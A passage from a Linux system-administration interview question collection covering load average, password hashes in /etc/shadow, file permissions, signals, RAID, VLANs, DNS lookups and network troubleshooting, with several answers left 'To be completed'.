These 3 numbers are not the numbers for the different CPUs. They are mean values of the load number over a given period of time (the last 1, 5 and 15 minutes).

**Load average** is usually described as the "average length of the run queue", so even a few CPU-consuming processes or threads can raise the **load average** above 1. There is no problem if the **load average** is less than the total number of CPU cores. But if it gets higher than the number of CPUs, this means some threads/processes will stay in the queue, ready to run, but waiting for a free CPU.

It is meant to give you an idea of the state of the system, averaged over several periods of time. Since it is averaged, it takes time for it to go back to 0 after a heavy load was placed on the system.

Some interpretations:

- if the averages are 0.0, then your system is idle
- if the 1 minute average is higher than the 5 or 15 minute averages, then load is increasing
- if the 1 minute average is lower than the 5 or 15 minute averages, then load is decreasing
- if they are higher than your CPU count, then you might have a performance problem (it depends)

Useful resources:

- [Linux Load Averages: Solving the Mystery (original)](http://www.brendangregg.com/blog/2017-08-08/linux-load-averages.html)
- [Linux load average - the definitive summary](http://blog.angulosolido.pt/2015/04/linux-load-average-definitive-summary.html)
- [How CPU load averages work (and using them to triage webserver performance!)](https://jvns.ca/blog/2016/02/07/cpu-load-averages/)

</details>

<details>
<summary><b>Where is my password stored on Linux/Unix?</b></summary><br>

The passwords are not stored anywhere on the system at all. What is stored in `/etc/shadow` are so-called hashes of the passwords. A hash of some text is created by performing a so-called one-way function on the text (password), thus creating a string to check against. By design it is "impossible" (computationally infeasible) to reverse that process.

Older Unix variants stored the encrypted passwords in `/etc/passwd` along with other information about each account. Newer ones simply have a `*` in the relevant field in `/etc/passwd` and use `/etc/shadow` to store the password, in part to ensure nobody gets read access to the passwords when they only need the other stuff (`shadow` is usually protected more strongly than `passwd`). For more info consult `man crypt`, `man shadow`, `man passwd`.
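To illustrate, you can inspect a single shadow entry (requires root; `alice` is a hypothetical user and the hash below is a made-up placeholder):

```bash
sudo grep '^alice:' /etc/shadow
# alice:$6$examplesalt$examplehash...:18000:0:99999:7:::
#
# The second field is the password hash: the $6$ prefix means SHA-512
# crypt ($1$ = MD5, $5$ = SHA-256); the remaining fields describe
# password aging (last change, min/max age, warning period, ...).
```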
Useful resources:

- [Where is my password stored on Linux?](https://security.stackexchange.com/questions/37050/where-is-my-password-stored-on-linux)
- [Where are the passwords of the users located in Linux?](https://www.cyberciti.biz/faq/where-are-the-passwords-of-the-users-located-in-linux/)
- [Linux Password & Shadow File Formats](https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html)

</details>

<details>
<summary><b>How to recursively change permissions for all directories except files and for all files except directories?</b></summary><br>

To change all the directories e.g. to **755** (`drwxr-xr-x`):

```bash
find /opt/data -type d -exec chmod 755 {} \;
```

To change all the files e.g. to **644** (`-rw-r--r--`):

```bash
find /opt/data -type f -exec chmod 644 {} \;
```

Useful resources:

- [How do I set chmod for a folder and all of its subfolders and files? (original)](https://stackoverflow.com/questions/3740152/how-do-i-set-chmod-for-a-folder-and-all-of-its-subfolders-and-files?rq=1)

</details>

<details>
<summary><b>Every command fails with <code>command not found</code>. How to trace the source of the error and resolve it?</b></summary><br>

It looks like something, at one point or another, is overwriting the default `PATH` environment variable. The type of errors you see indicates that `PATH` does not contain e.g. `/bin`, where the commands (including bash) reside.

One way to begin debugging your bash script or command would be to start a subshell with the `-x` option:

```bash
bash --login -x
```

This will show you every command, and its arguments, which is executed when starting that shell.

It is also very helpful to show the current `PATH` value:

```bash
echo $PATH
```

If you run this:

```bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin
```

most commands should start working - and then you can edit `~/.bash_profile` instead of `~/.bashrc` and fix whatever is resetting `PATH` there.

Default `PATH` values for **root** and other users are set in the `/etc/profile` file.

Useful resource:

- [How to correctly add a path to PATH?](https://unix.stackexchange.com/questions/26047/how-to-correctly-add-a-path-to-path)

</details>

<details>
<summary><b>You type <code>CTRL + C</code> but your script is still running. How do you stop it? ***</b></summary><br>

To be completed.

Useful resources:

- [How to kill a script running in terminal, without closing terminal (Ctrl + C doesn't work)? (original)](https://askubuntu.com/questions/520107/how-to-kill-a-script-running-in-terminal-without-closing-terminal-ctrl-c-doe)
- [What's the difference between ^C and ^D for Unix/Mac OS X terminal?](https://superuser.com/questions/169051/whats-the-difference-between-c-and-d-for-unix-mac-os-x-terminal)

</details>

<details>
<summary><b>What is the <code>grep</code> command? How to match multiple strings in the same line?</b></summary><br>

The `grep` utilities are a family of Unix tools, including `egrep` and `fgrep`. `grep` searches files for patterns. If you are looking for a specific pattern in the output of another command, `grep` highlights the relevant lines. Use this command for searching log files, specific processes, and more.

To match multiple strings:

```bash
grep -E "string1|string2" filename
```

or

```bash
grep -e "string1" -e "string2" filename
```

Useful resources:

- [What is grep, and how do I use it? (original)](https://kb.iu.edu/d/afiy)

</details>

<details>
<summary><b>Explain the file content commands along with the description.</b></summary><br>

- `head`: to check the beginning of a file.
- `tail`: to check the end of a file. It is the reverse of the head command.
- `cat`: used to view, create and concatenate files.
- `more`: used to display text in the terminal window in pager form.
- `less`: used to page through text; unlike `more`, it also allows backward movement and single-line movement.

Useful resources:

- [Viewing text files from the shell prompt](https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/4/html/Step_by_Step_Guide/s1-viewingtext-terminal.html)

</details>

<details>
<summary><b>SIGHUP, SIGINT, SIGKILL, and SIGTERM POSIX signals. Explain.</b></summary><br>

- **SIGHUP** - is sent to a process when its controlling terminal is closed. It was originally designed to notify the process of a serial line drop (a hangup). Many daemons will reload their configuration files and reopen their logfiles instead of exiting when receiving this signal.
- **SIGINT** - is sent to a process by its controlling terminal when a user wishes to interrupt the process. This is typically initiated by pressing `Ctrl+C`, but on some systems, the "delete" character or "break" key can be used.
- **SIGKILL** - is sent to a process to cause it to terminate immediately (kill). In contrast to **SIGTERM** and **SIGINT**, this signal cannot be caught or ignored, and the receiving process cannot perform any clean-up upon receiving this signal.
- **SIGTERM** - is sent to a process to request its termination. Unlike the **SIGKILL** signal, it can be caught and interpreted or ignored by the process. This allows the process to perform nice termination, releasing resources and saving state if appropriate. **SIGINT** is nearly identical to **SIGTERM**.

Useful resources:

- [POSIX signals](https://dsa.cs.tsinghua.edu.cn/oj/static/unix_signal.html)
- [Introduction To Unix Signals Programming](http://titania.ctie.monash.edu.au/signals/)

</details>

<details>
<summary><b>What does the <code>kill</code> command do?</b></summary><br>

In Unix and Unix-like operating systems, `kill` is a command used to send a signal to a process. By default, the message sent is the termination signal, which requests that the process exit. But `kill` is something of a misnomer; the signal sent may have nothing to do with process killing.

Useful resources:

- [Mastering the "Kill" Command in Linux](https://www.maketecheasier.com/kill-command-in-linux/)

</details>

<details>
<summary><b>What is the difference between <code>rm</code> and <code>rm -rf</code>?</b></summary><br>

`rm` only deletes the named files (and not directories). With `-rf` as you say:

- `-r`, `-R`, `--recursive` recursively deletes the content of a directory, including hidden files and sub-directories
- `-f`, `--force` ignore nonexistent files, never prompt

Useful resources:

- [What is the difference between `rm -r` and `rm -f`?](https://superuser.com/questions/1126206/what-is-the-difference-between-rm-r-and-rm-f)

</details>

<details>
<summary><b>How do I <code>grep</code> recursively? Explain on several examples. ***</b></summary>

To be completed.

</details>

<details>
<summary><b><code>archive.tgz</code> has ~30 GB. How do you list its content and extract only one file?</b></summary><br>

```bash
# list the content
tar tf archive.tgz

# extract a file
tar xf archive.tgz filename
```

Useful resources:

- [List the contents of a tar or tar.gz file](https://www.cyberciti.biz/faq/list-the-contents-of-a-tar-or-targz-file/)
- [How to extract specific file(s) from tar.gz](https://unix.stackexchange.com/questions/61461/how-to-extract-specific-files-from-tar-gz)

</details>

<details>
<summary><b>How to combine multiple shell commands in one line?</b></summary><br>

If you want to execute each command only if the previous one succeeded, then combine them using the `&&` operator:

```bash
cd /my_folder && rm *.jar && svn co path to repo && mvn compile package install
```

If one of the commands fails, then all other commands following it won't be executed.

If you want to execute all commands regardless of whether the previous ones failed or not, separate them with semicolons:

```bash
cd /my_folder; rm *.jar; svn co path to repo; mvn compile package install
```

In your case, I think you want the first case, where execution of the next command depends on the success of the previous one.

You can also put all the commands in a script and execute that instead:

```bash
#! /bin/sh
cd /my_folder \
&& rm *.jar \
&& svn co path to repo \
&& mvn compile package install
```

Useful resources:

- [Execute combine multiple linux commands in one line (original)](https://stackoverflow.com/questions/13077241/execute-combine-multiple-linux-commands-in-one-line)

</details>

<details>
<summary><b>What symbolic representation can you pass to <code>chmod</code> to give all users execute access to a file without affecting other permissions?</b></summary><br>

```bash
chmod a+x /path/to/file
```

- `a` - for all users
- `x` - for execute permission
- `r` - for read permission
- `w` - for write permission

Useful resources:

- [How to Set File Permissions Using chmod](https://www.washington.edu/computing/unix/permissions.html)
- [What does "chmod +x your_file_name" do and how do I use it?](https://askubuntu.com/questions/443789/what-does-chmod-x-filename-do-and-how-do-i-use-it)

</details>

<details>
<summary><b>How can I sync two local directories?</b></summary><br>

To sync the contents of **dir1** to **dir2** on the same system, type:

```bash
rsync -av --progress --delete dir1/ dir2
```

- `-a`, `--archive` - archive mode
- `--delete` - delete extraneous files from the destination dirs
- `-v`, `--verbose` - verbose mode (increase verbosity)
- `--progress` - show progress during transfer

Useful resources:

- [How can I sync two local directories? (original)](https://unix.stackexchange.com/questions/392536/how-can-i-sync-two-local-directories)
- [Synchronizing folders with rsync](https://www.jveweb.net/en/archives/2010/11/synchronizing-folders-with-rsync.html)

</details>

<details>
<summary><b>Many basic maintenance tasks require you to edit config files. Explain ways to undo the changes you make.</b></summary><br>

- make a manual backup of the file before editing (with brace expansion like this: `cp filename{,.orig}`)
- make a manual copy of the directory structure where the file is stored (e.g. with `cp`, `rsync` or `tar`)
- make a backup of the original file in your editor (e.g. set rules in your editor configuration file)
- the best solution is to use `git` (or any other version control) to keep track of configuration files (e.g. `etckeeper` for the `/etc` directory)
Useful resources:

- [Backup file with .bak before filename extension](https://unix.stackexchange.com/questions/66376/backup-file-with-bak-before-filename-extension)
- [Is it a good idea to use git for configuration file version controlling?](https://superuser.com/questions/1037211/is-it-a-good-idea-to-use-git-for-configuration-file-version-controlling)

</details>

<details>
<summary><b>You have to find all files larger than 20MB. How do you do it?</b></summary><br>

```bash
find / -type f -size +20M
```

Useful resources:

- [How can I find files that are bigger/smaller than x bytes?](https://superuser.com/questions/204564/how-can-i-find-files-that-are-bigger-smaller-than-x-bytes)

</details>

<details>
<summary><b>Why do we use <code>sudo su -</code> and not just <code>sudo su</code>?</b></summary><br>

`sudo` is available in most modern Linux distributions, where usually (but not always) the root user is disabled and has no password set. Therefore you cannot switch to the root user with `su` alone (you can try). You have to call `su` with root privileges: `sudo su`.

`su` just switches the user, providing a normal shell with an environment nearly the same as with the old user. `su -` invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.

Useful resources:

- [su vs sudo -s vs sudo -i vs sudo bash](https://unix.stackexchange.com/questions/35338/su-vs-sudo-s-vs-sudo-i-vs-sudo-bash)
- [Why do we use su - and not just su? (original)](https://unix.stackexchange.com/questions/7013/why-do-we-use-su-and-not-just-su)

</details>

<details>
<summary><b>How to find files that have been modified on your system in the past 60 minutes?</b></summary><br>

```bash
find / -mmin -60 -type f
```

Useful resources:

- [Get all files modified in last 30 days in a directory (original)](https://stackoverflow.com/questions/23070245/get-all-files-modified-in-last-30-days-in-a-directory)

</details>

<details>
<summary><b>What are the main reasons for keeping old log files?</b></summary><br>

They are essential to investigate issues on the system.

**Log management** is absolutely critical for IT security. Servers, firewalls, and other IT equipment keep log files that record important events and transactions. This information can provide important clues about hostile activity affecting your network from within and without. Log data can also provide information for identifying and troubleshooting equipment problems, including configuration problems and hardware failure.

It's your server's record of who's come to your site, when, and exactly what they looked at. It's incredibly detailed, showing:

- where folks came from
- what browser they were using
- exactly which files they looked at
- how long it took to load each file
- and a whole bunch of other nerdy stuff

Factors to consider:

- legal requirements for retention or destruction
- company policies for retention and destruction
- how long the logs are useful
- what questions you're hoping to answer from the logs
- how much space they take up

By collecting and analyzing logs, you can understand what transpires within your network. Each log file contains many pieces of information that can be invaluable, especially if you know how to read them and analyze them.
Useful resources:

- [How long do you keep log files?](https://serverfault.com/questions/135365/how-long-do-you-keep-log-files)

</details>

<details>
<summary><b>What is an incremental backup?</b></summary><br>

An incremental backup is a type of backup that only copies files that have changed since the previous backup.

Useful resources:

- [What Is Incremental Backup?](https://www.nakivo.com/blog/what-is-incremental-backup/)

</details>

<details>
<summary><b>What is RAID? What is RAID0, RAID1, RAID5, RAID6, RAID10?</b></summary><br>

A **RAID** (Redundant Array of Inexpensive Disks) is a technology that is used to increase the performance and/or reliability of data storage.

- **RAID0**: Also known as disk **striping**, a technique that breaks up a file and spreads the data across all the disk drives in a RAID group. There are no safeguards against failure.
- **RAID1**: A popular disk subsystem that increases safety by writing the same data on two drives. Called "**mirroring**", RAID 1 does not increase write performance, but read performance may equal up to the sum of each disk's performance. However, if one drive fails, the second drive is used, and the failed drive is manually replaced. After replacement, the RAID controller duplicates the contents of the working drive onto the new one.
- **RAID5**: A disk subsystem that increases safety by computing parity data and increases speed by interleaving data across three or more drives (**striping**). Upon failure of a single drive, subsequent reads can be calculated from the distributed parity such that no data is lost.
- **RAID6**: RAID 6 extends RAID 5 by adding another parity block. It requires a minimum of four disks and can continue to serve reads and writes despite any two concurrent disk failures. RAID 6 does not have a performance penalty for read operations, but it does have a performance penalty on write operations because of the overhead associated with parity calculations.
- **RAID10**: Also known as **RAID 1+0**, a RAID configuration that combines disk mirroring and disk striping to protect data. It requires a minimum of four disks, and stripes data across mirrored pairs. As long as one disk in each mirrored pair is functional, data can be retrieved. If two disks in the same mirrored pair fail, all data will be lost because there is no parity in the striped sets.

Useful resources:

- [RAID](https://www.prepressure.com/library/technology/raid)

</details>

<details>
<summary><b>How is a user's default group determined? How would you change it?</b></summary><br>

```bash
useradd -m -g initial_group username
```

`-g/--gid`: defines the group name or number of the user's initial login group. If specified, the group name must exist; if a group number is provided, it must refer to an already existing group. If not specified, the behaviour of useradd will depend on the `USERGROUPS_ENAB` variable contained in `/etc/login.defs`. The default behaviour (`USERGROUPS_ENAB yes`) is to create a group with the same name as the username, with **GID** equal to **UID**.

To change the default group of an existing user, you can use `usermod -g groupname username` (the group must already exist).

Useful resources:

- [How can I change a user's default group in Linux?](https://unix.stackexchange.com/questions/26675/how-can-i-change-a-users-default-group-in-linux)

</details>

<details>
<summary><b>What is your best command line text editor for daily working and scripting? ***</b></summary><br>

To be completed.
</details>

<details>
<summary><b>Why would you want to mount servers in a rack?</b></summary><br>

- Protecting Hardware
- Proper Cooling
- Organized Workspace
- Better Power Management
- Cleaner Environment

Useful resources:

- [5 Reasons to Rackmount Your PC](https://www.racksolutions.com/news/custom-projects/5-reasons-to-rackmount-pc/)

</details>

###### Network Questions (23)

<details>
<summary><b>Draw me a simple network diagram: you have 20 systems, 1 router, 4 switches, 5 servers, and a small IP block. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>What are the most important things to understand about the OSI (or any other) model?</b></summary><br>

The most important things to understand about the **OSI** (or any other) model are:

- we can divide up the protocols into layers
- layers provide encapsulation
- layers provide abstraction
- layers decouple functions from others

Useful resources:

- [OSI Model and Networking Protocols Relationship](https://networkengineering.stackexchange.com/questions/6380/osi-model-and-networking-protocols-relationship)

</details>

<details>
<summary><b>What is the difference between a VLAN and a subnet? Do you need a VLAN to set up a subnet?</b></summary><br>

**VLANs** and **subnets** solve different problems. **VLANs** work at Layer 2, thereby altering broadcast domains (for instance), whereas **subnets** are a Layer 3 concept in this context.

**Subnet** - a range of IP addresses determined by part of an address (often called the network address) and a subnet mask (netmask). For example, if the netmask is `255.255.255.0` (or `/24` for short), and the network address is `192.168.10.0`, then that defines a range of IP addresses `192.168.10.0` through `192.168.10.255`. Shorthand for writing that is `192.168.10.0/24`.

**VLAN** - a good way to think of this is "switch partitioning". Let's say you have an 8-port switch that is VLAN-able. You can assign 4 ports to one **VLAN** (say `VLAN 1`) and 4 ports to another **VLAN** (say `VLAN 2`). `VLAN 1` won't see any of `VLAN 2's` traffic and vice versa; logically, you now have two separate switches. Normally on a switch, if the switch hasn't seen a MAC address, it will "flood" the traffic to all other ports. **VLANs** prevent this.

A subnet is nothing more than a range of IP addresses that helps hosts communicate over layers 2 and 3. Each subnet does not require its own **VLAN**. **VLANs** are implemented for isolation (a VLAN is a sandbox for layer 2 communication: no two systems in different **VLANs** may communicate directly, though it can be achieved through **Inter-VLAN routing**), ease of management and security.

Useful resources:

- [What is the difference between a VLAN and a subnet? (original)](https://superuser.com/questions/353664/what-is-the-difference-between-a-vlan-and-a-subnet)
- [VLANS vs. subnets for network security and segmentation](https://networkengineering.stackexchange.com/questions/46899/vlans-vs-subnets-for-network-security-and-segmentation)

</details>

<details>
<summary><b>List 5 common network ports you should know.</b></summary><br>

<table style="width:100%">
<tr>
<th>SERVICE</th>
<th>PORT</th>
</tr>
<tr>
<td>SMTP</td>
<td>25</td>
</tr>
<tr>
<td>FTP</td>
<td>20 for data transfer, 21 for the control connection</td>
</tr>
<tr>
<td>DNS</td>
<td>53</td>
</tr>
<tr>
<td>DHCP</td>
<td>67/UDP for DHCP server, 68/UDP for DHCP client</td>
</tr>
<tr>
<td>SSH</td>
<td>22</td>
</tr>
</table>

Useful resources:

- [Red Hat Enterprise Linux 4: Security Guide - Common Ports](https://web.mit.edu/rhel-doc/4/RH-DOCS/rhel-sg-en-4/ch-ports.html)

</details>

<details>
<summary><b>What are POP and IMAP, and how do you choose which of them to implement?</b></summary><br>

POP and IMAP are both protocols for retrieving messages from a mail server to a mail client.

**POP** (_Post Office Protocol_) uses a one-way push from mail server to client. By default this will send messages to the POP mail client and remove them from the mail server, though it is possible to configure the mail server to retain all messages. Any actions you take on the message in your mail client (labeling, deleting, moving to a folder) will not be reflected on the mail server, and thus will be inaccessible to other mail clients pulling from the mail server. POP uses little storage space on the mail server and can be seen as more secure since messages only exist on one mail client instead of the mail server and multiple clients.

**IMAP** (_Internet Message Access Protocol_) uses two-way communication between mail server and client. Deleting or labeling a message in your mail client configured with IMAP will also delete or label the message on the mail server. IMAP allows for a similar experience when accessing mail across different clients or devices, since messages can exist in the same state across multiple devices. IMAP can also save disk space on the mail client by selectively syncing messages, deleting older messages from the mail client since it can sync them from the mail server later as needed.

Choose IMAP if you need to access messages across multiple devices and you want to save disk space on your client device. Choose POP if you want to save disk space on your mail server, only access messages from one client device, and ensure that messages do not exist on multiple systems.

</details>

<details>
<summary><b>How to check the default route and routing table?</b></summary><br>

Using the commands `netstat -nr`, `route -n` or `ip route show` we can see the default route and routing tables.

Useful resources:

- [How to check routes (routing table) in linux](https://howto.lintel.in/how-to-check-routes-routing-table-in-linux/)
- [FreeBSD Set a Default Route/Gateway](https://www.cyberciti.biz/faq/freebsd-setup-default-routing-with-route-command/)

</details>

<details>
<summary><b>What is the difference between 127.0.0.1 and localhost?</b></summary><br>

Well, the most likely difference is that you still have to do an actual lookup of `localhost` somewhere. If you use `127.0.0.1`, then (intelligent) software will just turn that directly into an IP address and use it. Some implementations of `gethostbyname` will detect the dotted format (and presumably the equivalent IPv6 format) and not do a lookup at all. Otherwise, the name has to be resolved.
And there's no guarantee that your hosts file will actually be used for that resolution (first, or at all), so `localhost` may become a totally different IP address. By that I mean that, on some systems, a local hosts file can be bypassed. The `host.conf` file controls this on Linux (and many other Unices).

If you use a Unix domain socket it'll be slightly faster than using TCP/IP (because of the lower overhead). Windows uses TCP/IP by default, whereas Linux tries to use a Unix domain socket if you choose `localhost` and TCP/IP if you use `127.0.0.1`.

Useful resources:

- [What is the difference between 127.0.0.1 and localhost?](https://stackoverflow.com/questions/7382602/what-is-the-difference-between-127-0-0-1-and-localhost)
- [localhost vs. 127.0.0.1](https://stackoverflow.com/questions/3715925/localhost-vs-127-0-0-1)

</details>

<details>
<summary><b>Which port is used for the <code>ping</code> command?</b></summary><br>

`ping` uses **ICMP**, specifically **ICMP echo request** and **ICMP echo reply** packets. There is no 'port' associated with **ICMP**. Ports are associated with the two IP transport layer protocols, TCP and UDP. **ICMP**, TCP, and UDP are "siblings"; they are not based on each other, but are three separate protocols that run on top of IP.

**ICMP** packets are identified by the 'protocol' field in the IP datagram header. **ICMP** does not use either UDP or TCP communications services, it uses raw IP communications services. This means that the **ICMP** message is carried directly in an IP datagram data field. `raw` comes from how this is implemented in software: to create and send an **ICMP** message, one opens a `raw` socket, builds a buffer containing the **ICMP** message, and then writes the buffer containing the message to the raw socket.

The IP protocol value for **ICMP** is 1. The protocol field is part of the IP header and identifies what is in the data portion of the IP datagram.

However, you could use `nmap` to see whether ports are open or not:

```bash
nmap -p 80 example.com
```

Useful resources:

- [Ping Port Number](https://networkengineering.stackexchange.com/questions/42463/ping-port-number)
- [Is it possible to ping an address:port?](https://superuser.com/questions/769541/is-it-possible-to-ping-an-addressport)

</details>

<details>
<summary><b>Server A can't talk to Server B. Describe possible reasons in a few steps.</b></summary><br>

To troubleshoot communication problems between servers, it is best to follow the TCP/IP stack:

1. **Application Layer**: are the services up and running on both servers? Are they correctly configured (e.g. do they bind the correct IP and the correct port)? Do application and system logs show meaningful errors?
2. **Transport Layer**: are the ports used by the application open (try telnet!)? Is it possible to ping the server?
3. **Network Layer**: is the firewall on the network or on the OS correctly configured? Is the IP stack correctly configured (IP, routes, DNS, etc.)? Are switches and routers working (check the ARP table!)?
4. **Physical Layer**: are the servers connected to a network? Are packets being lost?

</details>

<details>
<summary><b>Why won't the hostnames resolve on your server? Fix this issue. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>How to resolve a domain name (using external DNS) with the CLI? Can IPs be resolved to domain names?</b></summary><br>

Examples of resolving a domain name with an external DNS server:

```bash
# with host command:
host domain.com 8.8.8.8

# with dig command:
dig @9.9.9.9 google.com

# with nslookup command:
nslookup domain.com 8.8.8.8
```

You can (sometimes) resolve an IP address back to a hostname. An IP address can be stored against a **PTR** record. You can then do:

```bash
dig A <hostname>
```

to look up the IPv4 address for a host, or:

```bash
dig AAAA <hostname>
```

to look up the IPv6 address for a host, or:

```bash
dig PTR ZZZ.YYY.XXX.WWW.in-addr.arpa.
```

to look up the hostname for IPv4 address `WWW.XXX.YYY.ZZZ` (note the octets are reversed), or:

```bash
dig PTR b.a.9.8.7.6.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.
```

Useful resources:

- [How can I resolve a hostname to an IP address in a Bash script?](https://unix.stackexchange.com/questions/20784/how-can-i-resolve-a-hostname-to-an-ip-address-in-a-bash-script)
- [How To Resolve IP Addresses To Domain Names?](https://superuser.com/questions/315687/how-to-resolve-ip-addresses-to-domain-names)

</details>

<details>
<summary><b>How to test port connectivity with <code>telnet</code> or <code>nc</code>?</b></summary><br>

```bash
# with telnet command:
telnet code42.example.com 5432

# with nc (netcat) command:
nc -vz code42.example.com 5432
```

</details>

<details>
<summary><b>Why should you avoid <code>telnet</code> to administer a system remotely?</b></summary><br>

Modern operating systems have turned off all potentially insecure services by default. On the other hand, some vendors of network devices still allow communication to be established using the telnet protocol.

**Telnet** uses the most insecure method for communication. It sends data across the network in plain text format, and anybody can easily find out the password using a network sniffing tool.

In the case of **Telnet**, these issues include the passing of login credentials in plain text, which means anyone running a sniffer on your network can find the information he needs to take control of a device in a few seconds by eavesdropping on a **Telnet** login session.

Useful resources:

- [Telnet and SSH as a secure alternative](https://www.ssh.com/ssh/telnet)
- [How to telnet to an IP address on a specific port?](https://superuser.com/questions/339107/how-to-telnet-to-an-ip-address-on-a-specific-port)

</details>

<details>
<summary><b>What is the difference between <code>wget</code> and <code>curl</code>?</b></summary><br>

The main differences are:

- `wget`'s major strong side compared to `curl` is its ability to download recursively.
- `wget` is command line only.
- `curl` supports FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, FILE, POP3, IMAP, SMTP, RTMP and RTSP.

Useful resources:

- [What is the difference between curl and wget? (original)](https://unix.stackexchange.com/questions/47434/what-is-the-difference-between-curl-and-wget)

</details>

<details>
<summary><b>What is SSH and how does it work?</b></summary><br>

**SSH** stands for **Secure Shell**. It is a protocol that lets you drop from server "A" into a shell session on server "B" and interact with that remote server. For an **SSH** connection to be established, the remote machine (server B) must be running a piece of software called an **SSH** daemon, and the connecting machine (server A) must have an **SSH** client.
The **SSH** daemon listens for connections on a specific network port (default 22), authenticates connection requests, and spawns the appropriate environment if the user provides the correct credentials.

Useful resources:

- [Understanding the SSH Encryption and Connection Process](https://www.digitalocean.com/community/tutorials/understanding-the-ssh-encryption-and-connection-process)

</details>

<details>
<summary><b>Most tutorials suggest using SSH key authentication rather than password authentication. Why is it considered more secure?</b></summary><br>

An **SSH key** is an access credential in the SSH protocol. Its function is similar to that of user names and passwords, but the keys are primarily used for automated processes and for implementing single sign-on by system administrators and power users. Instead of requiring a user's password, it is possible to confirm the client's identity by using asymmetric cryptography algorithms, with public and private keys.

If your SSH service only allows public-key authentication, an attacker needs a copy of a private key corresponding to a public key stored on the server. If your SSH service allows password-based authentication, then your Internet-connected SSH server will be hammered day and night by bot-nets trying to guess user names and passwords. The bot-net needs no information, it can just try popular names and popular passwords. Apart from anything else, this clogs your logs.

Useful resources:

- [Key-Based Authentication (Public Key Authentication)](http://www.crypto-it.net/eng/tools/key-based-authentication.html)
- [SSH password vs. key authentication](https://security.stackexchange.com/questions/33381/ssh-password-vs-key-authentication)

</details>

<details>
<summary><b>What is a packet filter and how does it work?</b></summary><br>

**Packet filtering** is a firewall technique used to control network access by monitoring outgoing and incoming packets and allowing them to pass or halt based on the source and destination Internet Protocol (IP) addresses, protocols and ports.

Packet filtering is appropriate where there are modest security requirements. The internal (private) networks of many organizations are not highly segmented. Highly sophisticated firewalls are not necessary for isolating one part of the organization from another. However, it is prudent to provide some sort of protection of the production network from a lab or experimental network. A packet filtering device is a very appropriate measure for providing isolation of one subnet from another.

Operating at the network layer and transport layer of the TCP/IP protocol stack, every packet is examined as it enters the protocol stack. The network and transport headers are examined closely for the following information:

- **protocol (IP header, network layer)** - in the IP header, byte 9 (remember the byte count begins with zero) identifies the protocol of the packet. Most filter devices have the capability to differentiate between TCP, UDP, and ICMP.
- **source address (IP header, network layer)** - the source address is the 32-bit IP address of the host which created the packet.
- **destination address (IP header, network layer)** - the destination address is the 32-bit IP address of the host the packet is destined for.
- **source port (TCP or UDP header, transport layer)** - each end of a TCP or UDP network connection is bound to a port. TCP ports are separate and distinct from UDP ports.
Ports numbered below 1024 are reserved - they have a specifically defined use. Ports numbered 1024 and above are known as ephemeral ports; they can be used however a vendor chooses. For a list of "well known" ports, refer to RFC 1700. The source port is a pseudo-randomly assigned ephemeral port number, so it is often not very useful to filter on the source port.
- **destination port (TCP or UDP header, transport layer)** - the destination port number indicates a port that the packet is sent to. Each service on the destination host listens to a port. Some well-known ports that might be filtered are 20/TCP and 21/TCP - FTP data/control, 23/TCP - telnet, 80/TCP - http, and 53/TCP - DNS zone transfers.
- **connection status (TCP header, transport layer)** - the connection status tells whether the packet is the first packet of the network session. The ACK bit in the TCP header is set to "false" or 0 if this is the first packet in the session. It is simple to disallow a host from establishing a connection by rejecting or discarding any packets which have the ACK bit set to "false" or 0.

Useful resources:

- [Building Internet Firewalls - Packet Filtering](http://web.deu.edu.tr/static/oreily/networking/firewall/ch06_01.htm)

</details>

<details>
<summary><b>What are the advantages of using a reverse proxy server?</b></summary><br>

**Hide the topology and characteristics of your back-end servers**

The **reverse proxy server** can hide the presence and characteristics of the origin server. It acts as an intermediary between the internet cloud and the web server. This is good for security reasons, especially when you are using web hosting services.

**Allows transparent maintenance of backend servers**

Changes you make to servers running behind a reverse proxy are going to be completely transparent to your end users.

**Load Balancing**

The reverse proxy will then enforce a load balancing algorithm like round robin, weighted round robin, least connections, weighted least connections, or random, to distribute the load among the servers in the cluster. When a server goes down, the system will automatically fail over to the next server up, and users can continue with their secure file transfer activities.

**SSL offloading/termination**

Handles incoming HTTPS connections, decrypting the requests and passing unencrypted requests on to the web servers.

**IP masking**

Using a single IP but different URLs to route to different back-end servers.

Useful resources:

- [The Benefits of a Reverse Proxy](https://dzone.com/articles/benefits-reverse-proxy)

</details>

<details>
<summary><b>What is the difference between a router and a gateway? What is the default gateway?</b></summary><br>

**Router** describes the general technical function (layer-3 forwarding) or a hardware device intended for that purpose, while **gateway** describes the function for the local segment (providing connectivity to elsewhere). You could also state that "_you set up a router as gateway_". Another term is hop, which describes the forwarding between subnets.

The term **default gateway** is used to mean the router on your LAN which has the responsibility of being the first point of contact for traffic to computers outside the LAN. It's just a matter of perspective; the device is the same.
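For example, you can inspect (or change) the default gateway by looking at the routing table; a minimal sketch, assuming iproute2 is available and using 192.168.1.1 purely as an example gateway address:

```bash
# Show only the default route (iproute2)
ip route show default
# e.g.: default via 192.168.1.1 dev eth0

# Legacy equivalents (net-tools)
route -n
netstat -rn

# Replace the default gateway (example address, requires root)
sudo ip route replace default via 192.168.1.1
```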
Useful resources:

- [Difference between router and gateway (original)](https://networkengineering.stackexchange.com/questions/51426/difference-between-router-and-gateway)

</details>

<details>
<summary><b>Explain the function of each of the following DNS records: SOA, PTR, A, MX, and CNAME.</b></summary><br>

**DNS records** are basically mapping files that tell the DNS server which IP address each domain is associated with, and how to handle requests sent to each domain. Some **DNS record** types that are commonly used in nearly all DNS configurations are `A`, `AAAA`, `CNAME`, `MX`, `PTR`, `NS`, `SOA`, `SRV`, `TXT`, and `NAPTR`.

- **SOA** - Start Of Authority record
- **A** - Address Mapping record
- **AAAA** - IP Version 6 Address record
- **CNAME** - Canonical Name record
- **MX** - Mail Exchanger record
- **NS** - Name Server record
- **PTR** - Reverse-lookup Pointer record

Useful resources:

- [List of DNS record types](https://en.wikipedia.org/wiki/List_of_DNS_record_types)

</details>

<details>
<summary><b>Why couldn't MAC addresses be used instead of IPv4/6 for networking?</b></summary><br>

